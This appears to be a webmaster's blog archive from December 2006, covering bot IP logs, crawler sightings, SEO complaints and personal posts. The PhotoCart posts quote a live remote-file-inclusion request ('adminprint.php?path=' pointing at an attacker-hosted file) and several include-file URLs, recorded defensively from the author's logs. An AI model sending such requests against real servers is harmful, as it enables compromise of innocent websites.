62.94.87.159 [159reverse.gestinweb.it.] requested 17 pages as "libwww-perl/5.805"
63.246.154.22 [ukrainehosting.info.] requested 6 pages as "libwww-perl/5.805"
63.247.138.144 [excalibur.rtsdns.net.] requested 48 pages as "libwww-perl/5.805"
64.191.28.101 [brick5.hostnoc.net.] requested 140 pages as "libwww-perl/5.805"
64.191.56.190 [cricket.sulteia.com.] requested 4 pages as "libwww-perl/5.805"
64.235.234.128 [gemini.lunarpages.com.] requested 186 pages as "libwww-perl/5.805"
64.34.161.52 [img.iuploads.com.] requested 80 pages as "libwww-perl/5.805"
64.38.11.6 [managed.voipbiz.us.] requested 1 pages as "libwww-perl/5.79"
64.38.24.138 [server1.caribehost.com.] requested 62 pages as "libwww-perl/5.805"
64.8.114.12 [64-8-114-12.yourhostingprovider.net.] requested 142 pages as "libwww-perl/5.801"
64.8.114.14 [web-06.ihservers.com.] requested 238 pages as "libwww-perl/5.801"
64.8.118.4 [64-8-118-4.hsphereweb.com.] requested 773 pages as "libwww-perl/5.801"
64.8.118.5 [64-8-118-5.hsphereweb.com.] requested 1188 pages as "libwww-perl/5.801"
64.8.124.64 [64-8-124-64.yourethehost.net.] requested 82 pages as "libwww-perl/5.801"
65.38.168.212 [2yellow.veraserve.com.] requested 72 pages as "libwww-perl/5.805"
65.42.183.2 [walrus.bytehead.com.] requested 300 pages as "libwww-perl/5.79"
65.99.196.23 [unknown] requested 89 pages as "libwww-perl/5.805"
66.103.152.111 [server22.internet-hosting-services.com.] requested 281 pages as "libwww-perl/5.805"
66.151.255.65 [server.by016.net.] requested 3 pages as "libwww-perl/5.805"
66.159.142.166 [66-159-142-166.adsl.snet.net.] requested 1 pages as "libwww-perl/5.803"
66.234.10.177 [ns7.digicc.net.] requested 49 pages as "libwww-perl/5.65"
66.235.206.151 [host223.ipowerweb.com.] requested 66 pages as "libwww-perl/5.805"
66.235.221.231 [host131.ipowerweb.com.] requested 107 pages as "libwww-perl/5.805"
66.240.252.55 [su9325255.aspadmin.net.] requested 12 pages as "libwww-perl/5.803"
66.254.98.142 [angels.reflected.net.] requested 132 pages as "libwww-perl/5.803"
66.40.38.148 [host148.maxim.net.] requested 19 pages as "libwww-perl/5.65"
66.55.78.18 [66-55-78-18.yourhostingprovider.net.] requested 89 pages as "libwww-perl/5.801"
66.7.193.220 [interzone.shiftinteractive.net.] requested 170 pages as "libwww-perl/5.805"
66.70.121.80 [unknown] requested 96 pages as "libwww-perl/5.65"
67.159.26.45 [sanalsistem.net.] requested 7 pages as "libwww-perl/5.805"
67.159.26.99 [.] requested 62 pages as "libwww-perl/5.805"
67.18.16.82 [srv24.icx.pl.] requested 1 pages as "libwww-perl/5.805"
67.19.224.66 [lamda.asmallorange.com.] requested 84 pages as "libwww-perl/5.805"
67.19.65.132 [84.41.1343.static.theplanet.com.] requested 433 pages as "libwww-perl/5.805"
67.19.74.138 [www2.comradelycertitude.com.] requested 227 pages as "libwww-perl/5.805"
67.19.85.196 [c4.55.1343.static.theplanet.com.] requested 343 pages as "libwww-perl/5.805"
68.179.54.20 [static-68-179-54-20.ptr.terago.ca.] requested 123 pages as "libwww-perl/5.65"
68.186.32.50 [68-186-32-50.static.scrm.ca.charter.com.] requested 61 pages as "libwww-perl/5.79"
69.10.142.59 [unknown.rackforce.com.] requested 187 pages as "libwww-perl/5.805"
69.13.6.170 [unknown] requested 136 pages as "libwww-perl/5.53"
69.26.178.210 [iota.sitelutions.com.] requested 304 pages as "libwww-perl/5.805"
69.56.180.222 [de.b4.3845.static.theplanet.com.] requested 131 pages as "libwww-perl/5.805"
69.93.107.114 [72.6b.5d45.static.theplanet.com.] requested 5 pages as "libwww-perl/5.805"
70.84.122.194 [web1.titansolutions.net.] requested 267 pages as "libwww-perl/5.805"
70.84.220.210 [d2.dc.5446.static.theplanet.com.] requested 518 pages as "libwww-perl/5.805"
70.85.247.250 [fa.f7.5546.static.theplanet.com.] requested 35 pages as "libwww-perl/5.805"
70.85.66.162 [wobbuffet-202.pokemonpalace.net.] requested 205 pages as "libwww-perl/5.805"
70.86.151.130 [82.97.5646.static.theplanet.com.] requested 722 pages as "libwww-perl/5.65"
70.86.36.194 [titan.websiteactive.com.] requested 155 pages as "libwww-perl/5.805"
72.22.69.189 [host503.ipowerweb.com.] requested 63 pages as "libwww-perl/5.76"
72.232.141.146 [146.141.232.72.reverse.layeredtech.com.] requested 54 pages as "libwww-perl/5.805"
72.232.178.114 [bullfrog.frogee.com.] requested 27 pages as "libwww-perl/5.805"
72.232.233.170 [g1.eth4.colo1.cust3.fuzionservers.com.] requested 171 pages as "libwww-perl/5.805"
72.249.16.108 [actstwo.com.] requested 32 pages as "libwww-perl/5.805"
72.29.66.235 [bravo.dnshttp.com.] requested 31 pages as "libwww-perl/5.805"
72.29.71.74 [ggs-t.ggs-t.com.] requested 31 pages as "libwww-perl/5.805"
72.29.74.43 [deso.surpasshosting.com.] requested 61 pages as "libwww-perl/5.805"
72.29.76.238 [72-29-76-238.static.dimenoc.com.] requested 445 pages as "libwww-perl/5.805"
72.29.82.174 [pass57.dizinc.com.] requested 4 pages as "libwww-perl/5.805"
72.29.83.98 [jet33.hasweb.com.] requested 254 pages as "libwww-perl/5.805"
72.3.249.214 [ashopsoftware.com.] requested 50 pages as "libwww-perl/5.65"
72.35.81.67 [www70.privatelabeldns.com.] requested 235 pages as "libwww-perl/5.79"
72.36.156.123 [osd1.myhostcenter.com.] requested 98 pages as "libwww-perl/5.805"
72.5.54.51 [web13.lx.host.inap.sea.dotster.net.] requested 149 pages as "libwww-perl/5.65"
72.51.34.179 [unknown] requested 11 pages as "libwww-perl/5.79"
72.51.35.81 [ssnakess.com.] requested 325 pages as "libwww-perl/5.805"
74.52.1.10 [buycheaperwebhosting.com.] requested 58 pages as "libwww-perl/5.805"
74.52.133.146 [92.85.344a.static.theplanet.com.] requested 115 pages as "libwww-perl/5.805"
74.52.208.138 [8a.d0.344a.static.theplanet.com.] requested 3 pages as "libwww-perl/5.805"
74.52.68.106 [theshire.caffeinepress.co.uk.] requested 213 pages as "libwww-perl/5.805"
74.52.84.138 [8a.54.344a.static.theplanet.com.] requested 16 pages as "libwww-perl/5.805"
76.169.115.66 [cpe-76-169-115-66.socal.res.rr.com.] requested 81 pages as "libwww-perl/5.65"
80.239.140.226 [megahost.pl.] requested 14 pages as "libwww-perl/5.803"
80.39.80.183 [183.Red-80-39-80.staticIP.rima-tde.net.] requested 12 pages as "libwww-perl/5.65"
80.77.86.243 [unknown] requested 104 pages as "libwww-perl/5.805"
81.169.186.195 [moncserver.de.] requested 557 pages as "libwww-perl/5.803"
81.181.15.6 [unknown] requested 96 pages as "libwww-perl/5.805"
81.181.89.42 [unknown] requested 208 pages as "libwww-perl/5.805"
81.183.219.157 [dsl51B7DB9D.fixip.t-online.hu.] requested 106 pages as "libwww-perl/5.803"
81.208.31.216 [81-208-31-216.ip.fastwebnet.it.] requested 8 pages as "libwww-perl/5.79"
82.165.231.16 [u15174557.onlinehome-server.com.] requested 122 pages as "libwww-perl/5.79"
82.165.27.174 [p15173001.pureserver.info.] requested 36 pages as "libwww-perl/5.76"
82.165.36.226 [russellgrantastrology.com.] requested 147 pages as "libwww-perl/5.65"
82.210.7.28 [82.210.7.28.rev.worldbone.de.] requested 29 pages as "libwww-perl/5.803"
83.138.166.13 [s79719.lovehorse.co.uk.] requested 41 pages as "libwww-perl/5.79"
83.15.63.115 [eih115.internetdsl.tpnet.pl.] requested 5 pages as "libwww-perl/5.803"
83.65.104.210 [83-65-104-210.klagenfurt-nord.xdsl-line.inode.at.] requested 55 pages as "libwww-perl/5.69"
85.214.19.18 [copyworld-kiel.de.] requested 294 pages as "libwww-perl/5.69"
85.25.134.185 [alpha961.server4you.de.] requested 23 pages as "libwww-perl/5.803"
87.236.194.104 [unassigned-87.236.194.104.coolhousing.net.] requested 55 pages as "libwww-perl/5.805"
88.149.156.142 [www.futurweb.info.] requested 24 pages as "libwww-perl/5.803"
89.108.80.229 [server2.vlr.ru.] requested 40 pages as "libwww-perl/5.805"
89.207.232.18 [unknown] requested 37 pages as "libwww-perl/5.79"
I haven't fully processed this list yet, but 17 of these IPs are in blocks assigned to theplanet.com.

The only thing I find most amusing here is we hear so much about compromised home computers being involved in botnets and this batch, for the most part, appears to be primarily dedicated servers in data centers.

This just verifies what I've been preaching about blocking access to your server from data centers as they are a source of many problems from scrapers to hackers.

Saturday, December 30, 2006

PhotoCart vulnerability claims another website

UPDATE: 12/31 and it appears Softlayer took the server on IP 208.101.16.120 offline at this time. The PhotoCart attackers apparently aren't aware of this yet because there is still an ongoing attack referencing empzone.com as I write this. At least it will do no harm to innocent sites at the moment. Thank You Softlayer for the prompt action.

The latest wave of PhotoCart vulnerability attacks just claimed a new website.

This time they claimed Husnaweb.com, someone's blog, as a victim.

I first notified the owner of Husnaweb and the data center Softlayer of the problem on 12/20. They promptly removed the file http://www.husnaweb.com/c.in from the server and the PhotoCart attacks stopped for a couple of days. Then the attacks started up again when the file showed up on the server again, so apparently Husnaweb was still vulnerable itself and being actively exploited.

I wrote back to the site owner and Softlayer again on 12/25 assuming they would deal with it eventually, being it was a holiday, and today noticed they appear to have simply given up on the blog as Husnaweb is gone and it's now a parked page on GoDaddy.

Today the attacks started up all over again using this page request:

"GET /PhotoCart/adminprint.php?path=http://empzone.com/c.ar?"

host empzone.com has address 208.101.16.120
host 208.101.16.120 -> 208.101.16.120-static.reverse.baserunner.net

whois 208.101.16.120

OrgName: SoftLayer Technologies Inc.
OrgID: SOFTL
Address: 1950 N Stemmons Freeway
City: Dallas
StateProv: TX
PostalCode: 75207
Country: US

NetRange: 208.101.0.0 - 208.101.63.255
Looks like empzone.com will be their next victim, notifying data center Softlayer yet again that another Softlayer customer has been breached.

Anyone notice a trend here?

The other site I reported about, wnydir.com, was also a Softlayer customer.
host wnydir.com has address 208.101.16.120
host 208.101.16.120 -> 208.101.16.120-static.reverse.baserunner.net
The reverse DNS on the sites all point to baserunner.net which says "Coming Soon", no contact information.

I must be getting slow in my old age, they're all on the same IP address, it would appear that the server has been compromised.

Ah well, this makes my next letter to Softlayer a little different now doesn't it?

Friday, December 29, 2006

The Zen of MP3 Part Deux Point Oh

Well, I was a bad boy and dropped my Zen micro one too many times. A few days ago I dropped the damn thing and it came up with a panic menu with options like FORMAT, REBOOT, and all sorts of goodies. Luckily a few minutes later it came back to life and ran for a couple of days more until, you guessed it, I dropped it again and it won't get past the failure menu.

DEAD.

It's really sad, you can hear the hard disk scraping when you put your ear to the Zen Micro, just sad.

Anyway, I ran out to Worst Buy the next day and got a replacement Zen and this time picked the black version of the 4GB Zen V Plus which is about half the size of the Zen Micro, has a color display, can show pictures and videos, quite a cute little toy. Didn't even have to install new software or a new USB cable as it works with my existing USB cable just fine. Uploaded all my MP3's and Yahoo Music and was back in action in no time.

For those of you about to ask why I didn't get an iPod, my wife has 2 of the fucking things and I hate using them. More than I loathe Apple and the crappy iPod interface, I loathe being locked into iTunes. They can take that proprietary shit and shove it which is why I also didn't get a Zune although they looked pretty cool. She didn't buy them either, they were gifts, so she's just stuck using them to be polite. FWIW, she picked my first Zen for me as a present so we all know what she prefers!

The new Zen V rocks!

It's not touch sensitive like the old Zen Micro and has mechanical switches and everything is flush to the case so it's damn near next to impossible to accidentally engage a command so I've not used the LOCK function yet.

The only downsides I've seen so far is that scrolling the list of All Tracks is slower than shit and if your unit LOCKS UP, which mine did once setting it up, the RESET button on the side needs tools that only a microbiologist would possess to depress that micro button. Word to the wise, keep a safety pin handy in case it locks up because you can't open the back and remove the battery or anything useful like that, you're just fucked without micro-tools handy.

Since I was replacing the Zen it seemed a no brainer to treat myself with a pair of new headphones and got a set of Bose Triport headphones which are very nice. Not the most expensive Bose headphones out there, but they sound damn nice compared to the Sony headphones I was using.

Yes, the Bose are big but I hate earbuds.

Anyway, this time the Zen upgrade was completely painless and I'm a happy boy with a new toy.

Wednesday, December 27, 2006

Ho! Ho! Ho! I'm Baaaaack....

Went away for a few days to visit my Mom in Nevada for Christmas, a brief 5 hour drive, and surprisingly had very little separation anxiety from the computer, internet, blog or any of this crap. Maybe the free Wifi helped with the 'net separation anxiety but I digress.

Rented the usual suite at the Holiday Inn Express, which is by far the best hotel in that pit of a Nevada town. Got a nice 55" HDTV with a DVD player in the living room and a huge whirlpool tub in the bedroom. They have free WiFi of course, mentioned above, which I used sparingly just to keep an eye on my sites and make sure they were up and collecting coin.

Quite nice for the price.

Brought a couple of DVD's to watch at night, some bourbon for the whirlpool, and I was good to go.

Sadly, the cat had a crappy Christmas as he had a traumatic moment right before we left. We were just about to head out to my mom’s place and for reasons unknown the cat decided to sit right between where my wife and I were standing fairly close together. Suddenly, my wife accidentally steps on the cats paw at which point he screams. She hears this noise and quickly turns around to see what’s wrong with the cat, still standing on his paw grinding it further into the carpet as she turns on it. The cat starts hissing, spitting, screaming and flipping out.

She finally realized what was going on and takes her foot off the cat at which point there was one pissed off ball of flying fur running through the house. The cat, in typical cat fashion, was hiding under everything until I finally captured him 15 minutes later. Upon close inspection the cat turned out to be very upset but completely unhurt from being stepped upon.

Unfortunately, we had to leave while he was still bent out of shape and luckily for us he wasn’t holding a grudge and was happy to see us when we got back the next day.

Now the fun part of this short holiday vacation was the bad weather on the return trip.

Almost all the way back to Reno and beyond there were very high winds 45 mph and higher that were kicking up dust and sand storms, pelting my car with rocks, and there were huge tumbleweeds rolling all over the roads. One of the big tumbleweeds got pulverized by the SUV in front of my car and we got pelted with all the tumbleweed chunks. We managed to get past Reno right before before a couple of 18 wheelers got blown over, one of them a Walmart truck according to the news.

If the wind, dust, rocks and tumbleweeds weren't bad enough, we had pouring rain west of Sacramento and the wind was still blowing hard which caused a lot of traffic jams as the nervous drivers all started breaking everywhere.

Took forever to get home...

Don't you just *LOVE* the holidays?

BAH! HUMBUG!

Friday, December 22, 2006

PhotoCart Attack Takes a Holiday

So far I've gotten 3 or 4 sites shut down or cleaned up where the botnet of PhotoCart attackers have been storing their include files. Been quiet for a couple of days now since the last one was cleaned up so I'm wondering if, who am I kidding, WHEN the attacks will start up again with a file referenced from yet another new location.

I didn't even bother posting about the last attack and domain they used as I got it cleaned up pretty quick and the source of the attack was pretty much the same.

So you PhotoCart hacking clowns, ready for me to shut down your next site or should we go after your botnet instead?

Come on, make my day...

First Look - SMBot 1.0 Crawls via Amazon Web Services

Maybe this is how Amazon responded to my tongue-in-cheek request to set the user agent on their crawler.

I have no clue why SpecificMedia would be attempting to crawl my site, or why they are coming from an Amazon IP address. Maybe it's possible when you hire the AWS for a specific task they just plug in the customer name as the UA. Perhaps Amazon just auctioned off the user agent to the highest bidder for some viral marketing thing, who knows.

Anyway, here's the IP's and the user agent seen crawling:

216.182.231.65
[domU-12-31-33-00-03-EB.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"

216.182.225.220
[domU-12-31-33-00-03-92.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"

216.182.231.59
[domU-12-31-33-00-03-ED.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"

216.182.228.145
[domU-12-31-33-00-02-53.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"

216.182.230.236
[domU-12-31-33-00-03-26.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"

216.182.225.180
[domU-12-31-33-00-03-02.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"

216.182.231.86
[domU-12-31-33-00-03-D8.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"

216.182.231.93
[domU-12-31-33-00-03-CF.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"

216.182.228.139
[domU-12-31-33-00-02-55.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"

216.182.230.163
[domU-12-31-33-00-03-6D.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"

216.182.231.20
[domU-12-31-33-00-04-16.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"
Just what we need, more crap crawling the web.

Joy.

Blog Pimps and Web Whores

When you have a new product or service and can't get anyone to write about it, what do you do?

You go to a Blog Pimp for help, that's what you do!

The Pimp will hook your ass up with some blogging Web Whore that will review your shit for a fee ranging from $40-$500. Let's get serious now people, if you have a really worthwhile opinion you can make a heck of a lot more than 40 freaking dollars. The most common amount on the high end seems to be around $100 which isn't bad if you can knock out several paid reviews a day.

Here's the only problem I see with this scenario is that many people may get annoyed and stop reading your blog if every post, or every other post, becomes some paid fluff piece.

If you're a serious blogger and have spent a substantial amount of time building up your brand so that you can attract traditional advertisers then why in hell would you risk polluting your brand with paid posts?

The next thing you know the advertisers paying for the posts will insist on the comments for those posts being censored, or the blogger will censor them by default just in the hopes of appeasing the advertiser and getting more paid post work in the future.

That's the problem with being a paid Web Whore is that you start down that slippery slope of selling your soul to the highest bidder and your blog suddenly really isn't your blog anymore and you'll feel stifled in your own creation.

Good luck with those paid posts and let me know how selling out works for you all.

P.S. Just for giggles I browsed some of the blogs listed and this site ranked as high as some of the sites asking for $100 per review, which is really sad. Caveat Emptor.

Wednesday, December 20, 2006

SEM Nightmare - Yahoo Thinks I'm a Typo

UPDATE: Thanks to help from Danny Sullivan getting in touch with Tim Mayer over at Yahoo, this has been fixed.

Here's a recent and strange twist in the ever changing Yahoo landscape, I'm a typo.

That's right, this must've happened just recently too, searching for INCREDIBILL shows results for INCREDIBLE instead of what I actually typed, but I still show up in #10. Those poor folks at Incredibill.com, the billing company, aren't even in the top 100. Now change the search to use quotes and search for "INCREDIBILL" and you get the results that I expected in the first place, and that billing company shows up #6.

I have to ask WTF is up with this shit?

Did I accidentally piss in someone's cornflakes at Yahoo and get a handjob in the search engine to make sure people can't find my tirades that may occasionally point out some flaws in Yahoo?

Maybe they just decided they know best about what you wanted to find regardless of what you typed and decided to give us all a big corporate dose of "WE'RE SMARTER SO FUCK YOU!" with the search results.

Now the SEM implications here are huge as brand names are never dictionary words and Yahoo making assumptions about what you MIGHT want based on the nearest actual word in the dictionary is a potentially nasty turn of events.

Anyone else notice any obviously bizarre results lately for certain searches?

Let's compare notes...

Tuesday, December 19, 2006

Heads Up! Here comes Attributor

There's something new on the horizon in the rash of copyright protection services called Attributor that announced major VC funding yesterday. The WSJ ran a piece about how Attributor will scan the web for violations, and noted the founders are ex-Yahooligans.

Did a quick look at Attributor and they seem to be on the Yahoo backbone which is interesing.

host attributor.com
attributor.com has address 68.142.234.103
attributor.com has address 68.142.234.104
attributor.com has address 68.142.234.105
attributor.com has address 68.142.234.106
attributor.com has address 68.142.234.76
attributor.com has address 68.142.234.77

host 68.142.234.103
103.234.142.68.in-addr.arpa domain name pointer p3w10.geo.re2.yahoo.com.

host 68.142.234.104
104.234.142.68.in-addr.arpa domain name pointer p3w11.geo.re2.yahoo.com.

host 68.142.234.77
77.234.142.68.in-addr.arpa domain name pointer p3w9.geo.re2.yahoo.com.

whois 68.142.234.77

OrgName: Inktomi Corporation
OrgID: INKT
Address: 701 First Ave
City: Sunnyvale
StateProv: CA
PostalCode: 94089
Country: US

NetRange: 68.142.192.0 - 68.142.255.255
Didn't notice anything obvious crawling from that range in my blocked bots log but it's possible I let them slide because they are within the Yahoo/Inktomi range, will need to check that out.

However, the WSJ article did mention that they have "...begun testing a system to scan the billions of pages on the Web..." and that "The company says it will have over 10 billion Web pages in its index before the end of this month." which I find hard to believe they crawled on their own completely unnoticed unless they are sharing Yahoo's cache.

No clue at the moment, but keep an eye out for whatever this is.

Let the Yahoo IP address hysteria start in 5... 4... 3... 2....

Blog Tag - 5 Things You Don't Want To Know About IncrediBILL

I got tagged by SpamHuntress and Skore in the ongoing game of blog tag, maybe others tagged me, who knows.

Anyway, here goes with 5 things you don't know about me:

  1. Once upon a time I was a budding musician that played both soprano and bass clarinet in the St Joseph, MO Municipal Band playing Big Band music and Show Tunes. Also played a fair amount of classical in the Missouri Western State University's college symphony. However, I threw in the towel on tooting a horn when the computer bug bit me hard and it turned into a full-time career.
  2. After taking 4 whole years of French in high school, 15 years later spent 3 whole days in Paris. Now the irony is I didn't take typing in HS and took French instead, yet now spend all day every day typing at the computer and rarely ever speak French.
  3. Paintball is one of my favorite hobbies and I will shoot your ass where you stand and giggle with glee at your new found pain.
  4. I roller skate! Even backwards and sideways! We're talking about the REAL 4 wheel skates, none of that pansy ass inline skating crap.
  5. I love playing cards on Pogo.com and you can often catch me there as "IncrediBILL_" playing Spades, Hearts, Gin, Canasta, Cribbage, etc.. Bring your A-game if you look me up for a game or two as I'm a fierce competitor in cards, just ask my wife who I frequently trounce ;)
Now let's tag 5 people that might be interesting like Martinibuster, John Andrews, Willmacc, Phil Maher and Aaron Pratt.

Something Squirrelly Tried to Grab-My-Site

Caught something attempting to speed through my site with downloading on the agenda:

209.253.35.226 [bscop.bluesquirrel.com.] requested 340 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1.)"
Went to Blue Squirrel's site to see what they were and big surprise they have some website downloading tools like Grab-a-site and WebWhacker.

Here's my favorite part where the Grab-a-site software's options default to stealth mode:
User Agent - Lets you set how Grab-a-Site reports itself to the web servers. By default, it sends "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1.)" which makes it look like an Internet Explorer version 6.0.
This product may be responsible for some of the stealth activity we see in our log files and it's obviously trying to hide from webmasters otherwise the default UA would be the name of the product and not MSIE 6.0.

Saturday, December 16, 2006

Compromised Within My Own Data Center

Today was interesting as I noticed a couple of servers within my own data center taking aim at my servers. One IP address was attempting a bazillion user names and passwords on SSH and the other IP address was scanning pages on the web server. Now scanning pages on the web server isn't such a big deal, but when I went to look at the server and see who they were, it attempted to inject a virus into my computer using a browser vulnerability.

Just finished reporting both incidents to the support staff at the hosting company and we'll wait and see how they respond. If they leave the virus injecting server online I will probably have to take my business elsewhere as that's just not cool, and of course everyone will find out who they are and what they said at that point.

Now we wait...

Friday, December 15, 2006

New Crawling From EV1Servers

No clue what this is or who it's related to yet, but it's definitely a bot of some sort doing a crawl distributed over a d-block at EV1. Since it was from their data center it was already blocked and fed breadcrumb pages to see where the data shows up, if ever.

Here's the alarm it set off...

PROXIMITY ALERT!
209.85.54. [ev1s-209-85-54-130.ev1servers.net.]

209.85.54.130 pages 6- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.132 pages 4- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.134 pages 2- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.135 pages 5- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.137 pages 2- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.138 pages 2- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.139 pages 3- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.140 pages 3- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.143 pages 1- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.146 pages 3- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Now we just sit back and wait and watch to see where this info pops up as it could always be just a data mining operation which never shows up in the index.

Thursday, December 14, 2006

Next Wave PhotoCart Attack With New Domain

These assholes just don't stop trying this PhotoCart vulnerability, it's quite idiotic since it didn't work the last few thousand times they hit my site.

They have a new domain:

http://www.wnydir.com/c.in
Which currently proclaims:
Bandwidth Limit Exceeded The server is temporarily unable to service your request due to the site owner reaching his/her bandwidth limit. Please try again later.
Keep an eye on it, probably will be back up later or tomorrow, who knows.

These botnet guys obviously aren't the smartest tacks on the cork board picking a domain with throttled bandwidth to work from, but it's probably a hacked site and now that poor customer has no clue he's offline due to vandalism.

Here's the list of attackers so far today:
72.29.76.238 [72-29-76-238.static.dimenoc.com.] requested 86 pages as "libwww-perl/5.805"
70.86.151.130 [82.97.5646.static.theplanet.com.] requested 45 pages as "libwww-perl/5.65"
66.254.98.142 [angels.reflected.net.] requested 39 pages as "libwww-perl/5.803"
64.8.118.4 [64-8-118-4.hsphereweb.com.] requested 42 pages as "libwww-perl/5.801"
67.19.65.132 [84.41.1343.static.theplanet.com.] requested 41 pages as "libwww-perl/5.805"
64.8.114.12 [64-8-114-12.yourhostingprovider.net.] requested 43 pages as "libwww-perl/5.801"
69.56.180.222 [de.b4.3845.static.theplanet.com.] requested 27 pages as "libwww-perl/5.805"
85.214.19.18 [copyworld-kiel.de.] requested 53 pages as "libwww-perl/5.69"
195.242.211.253 [faq.ecobike.de.] requested 17 pages as "libwww-perl/5.48"
67.159.26.99 [.] requested 2 pages as "libwww-perl/5.805"
140.117.73.1 [finance.nsysu.edu.tw.] requested 41 pages as "libwww-perl/5.805"
203.194.134.166 [unknown] requested 37 pages as "libwww-perl/5.65"
66.103.152.111 [server22.internet-hosting-services.com.] requested 50 pages as "libwww-perl/5.805"
81.181.89.42 [cipnet.is.ew.ro.] requested 38 pages as "libwww-perl/5.805"
64.8.114.14 [web-06.ihservers.com.] requested 65 pages as "libwww-perl/5.801"
62.4.70.180 [62.4.70.180.fantasyvirtual.com.] requested 42 pages as "libwww-perl/5.803"
203.146.140.221 [besthost5.com.] requested 29 pages as "libwww-perl/5.64"
207.158.61.3 [ns1.control8.com.] requested 45 pages as "libwww-perl/5.79"
81.169.186.195 [moncserver.de.] requested 52 pages as "libwww-perl/5.803"
203.167.88.76 [unknown] requested 29 pages as "libwww-perl/5.65"
62.221.213.68 [unknown] requested 14 pages as "libwww-perl/5.65"
64.8.118.5 [64-8-118-5.hsphereweb.com.] requested 28 pages as "libwww-perl/5.801"
189.146.75.42 [dsl-189-146-75-42.prod-infinitum.com.mx.] requested 19 pages as "libwww-perl/5.803"
81.183.219.157 [dsl51B7DB9D.fixip.t-online.hu.] requested 14 pages as "libwww-perl/5.803"
I wonder what compromised site they'll be using tomorrow?